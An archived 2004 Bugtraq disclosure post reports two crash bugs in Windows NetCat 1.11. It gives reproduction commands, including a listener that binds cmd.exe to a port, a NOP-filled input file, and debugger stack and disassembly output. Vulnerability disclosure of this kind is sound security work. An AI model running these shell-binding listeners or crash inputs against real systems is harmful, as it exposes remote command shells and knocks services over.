NetCat V 1.11 Multiple Bugs

From: CorryL (corryl80_at_gmail.com)
Date: 12/30/04

    Date: 30 Dec 2004 15:36:43 -0000
    To: bugtraq@securityfocus.com

    Hello, nc V1.11 is bugged

    execute nc -p 777 -L -e cmd.exe

    create the file prova.txt and insert

    \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90

    execute nc 127.0.0.1 777 < prova.txt

    Enjoy
    0012FC18 00340D98 ASCII "cmd.exe"
    0012FC1C 00000000
    0012FC20 77F3372D RETURN to ntdll.77F3372D
    0012FC24 77E21BFA RETURN to kernel32.77E21BFA from ntdll.ZwWaitForMultipleObjects
    0012FC28 00000003
    0012FC2C 0012FC6C
    0012FC30 00000001
    0012FC34 00000000
    0012FC38 00000000
    0012FC3C 77E2AF20 kernel32.CreateThread
    0012FC40 00340C90
    0012FC44 00000000
    0012FC48 00000024
    0012FC4C 00000001
    0012FC50 00000000

    77F3372D C2 1400 RETN 14
    77F33730 90 NOP
    77F33731 90 NOP
    77F33732 90 NOP
    77F33733 90 NOP
    77F33734 90 NOP
    77F33735 > B8 19010000 MOV EAX,119
    77F3373A BA 0003FE7F MOV EDX,7FFE0300
    77F3373F FFD2 CALL EDX
    77F33741 C2 0C00 RETN 0C
    77F33744 90 NOP
    77F33745 90 NOP
    77F33746 90 NOP
    77F33747 90 NOP
    77F33748 90 NOP
    77F33749 > B8 1A010000 MOV EAX,11A
    77F3374E BA 0003FE7F MOV EDX,7FFE0300
    77F33753 FFD2 CALL EDX
    77F33755 C2 0400 RETN 4
    77F33758 90 NOP
    77F33759 90 NOP
    77F3375A 90 NOP
    77F3375B 90 NOP
    77F3375C 90 NOP
    77F3375D > B8 1B010000 MOV EAX,11B
    77F33762 BA 0003FE7F MOV EDX,7FFE0300
    77F33767 FFD2 CALL EDX
    77F33769 C2 0400 RETN 4
    77F3376C 90 NOP
    77F3376D 90 NOP
    77F3376E 90 NOP
    77F3376F 90 NOP
    77F33770 90 NOP
    77F33771 > B8 1C010000 MOV EAX,11C
    77F33776 BA 0003FE7F MOV EDX,7FFE0300
    77F3377B FFD2 CALL EDX
    77F3377D C2 2400 RETN 24

    nc is blocked

    another bug

    nc -l -vv -p 4000

    nc 127.0.0.1 4000 < nc.exe

    NetCat freezes

    By CorryL

    Admin www.x0n3-h4ck.tk Italian Security Team

